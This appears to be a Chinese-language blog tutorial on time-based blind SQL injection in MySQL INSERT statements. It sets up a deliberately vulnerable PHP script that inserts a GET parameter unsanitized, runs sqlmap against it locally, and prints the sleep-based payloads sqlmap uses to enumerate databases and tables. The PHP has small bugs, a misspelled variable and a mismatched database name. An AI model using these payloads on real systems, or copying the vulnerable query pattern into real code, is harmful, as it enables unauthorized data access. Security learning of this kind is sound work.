首先建个数据库和一张表:
create database blog;
create table admin(id int primary key auto_increment,email varchar(500));
写个insert.php方便sqlmap跑:
<?php
$conn=mysql_connect("localhost","root","yourpass");
mysql_select_db("admin",$conn);
if(isset($_GET["email"])){
$email=$_GET['email'];
mysql_query("insert into admin(email) values('$emal')");
}
?>
用seay的mysql监控来监控数据库执行的语句,这样比抓包要方便一些。
sqlmap -u http://127.0.0.1/[email protected]
测试出延时注入,payload是[email protected]’ and sleep(5) and ‘ufwy’=’ufwy
那么对应的数据库执行语句就应该为:
insert into admin(email) values('[email protected]' and sleep(5) and 'ufwy'='ufwy');
在mysql监控里查看下它是怎么跑–dbs的:
insert into admin(email)values('[email protected]' AND 4830=IF((ORD(MID((SELECT IFNULL(CAST(COUNT(DISTINCT(schema_name)) AS CHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),1,1)) > 51),SLEEP(5),4830) AND 'XDSc'='XDSc')
insert into admin(email)values('[email protected]' AND 6499=IF((ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),1,1)) > 64),SLEEP(2),6499) AND 'ngXr'='ngXr')
-D blog –tables
insert into admin(email)values('[email protected]' AND 3039=IF((ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x626c6f67 LIMIT 1,1),7,1)) > 112),SLEEP(6),3039) AND 'sAEl'='sAEl')
-D blog -T admin –dump
果没有跑出来,延时注入的局限性太大了,当然也有insert报错注入的情况,只是不适合上面这种情况。
总之insert into延时注入的核心就是:
insert into blog(email) values('[email protected]' and if(true,sleep(5),0);
来源 未知
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论